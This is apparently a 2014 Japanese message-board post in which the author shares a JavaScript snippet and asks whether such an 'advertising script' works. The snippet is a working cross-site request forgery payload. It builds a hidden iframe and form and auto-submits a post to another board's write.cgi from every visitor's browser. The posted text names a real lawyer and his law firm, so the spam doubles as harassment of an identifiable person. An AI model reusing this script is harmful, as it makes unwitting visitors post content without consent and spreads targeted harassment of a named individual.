80 名無しさん@UVERworld BBS 2014/08/01(金) 03:08:22 ID:TM3ZVozg
宣伝スクリプトってこういうのでいいんか
<script language="javascript">
<!--
document.write("<iframe name=\"FrameName\" width=\"0\" height=\"0\"></iframe>");
document.write("<form name=\"FormName\" action=\"http://jbbs.shitaraba.net/bbs/write.cgi/\" method=\"post\" target=\"FrameName\">");
document.write("<input type=\"hidden\" name=\"MESSAGE\" value=\"誹謗中傷対策は 恒心綜合法律事務所 まで http://www.koushin-lawfirm.jp/\">");
document.write("<input type=\"hidden\" name=\"DIR\" value=\"computer\">");
document.write("<input type=\"hidden\" name=\"BBS\" value=\"31465\">");
document.write("<input type=\"hidden\" name=\"SUBJECT\" value=\"恒心綜合法律事務所 弁護士 唐澤貴洋 \">");
document.write("</form>");
document.FormName.submit();
</script>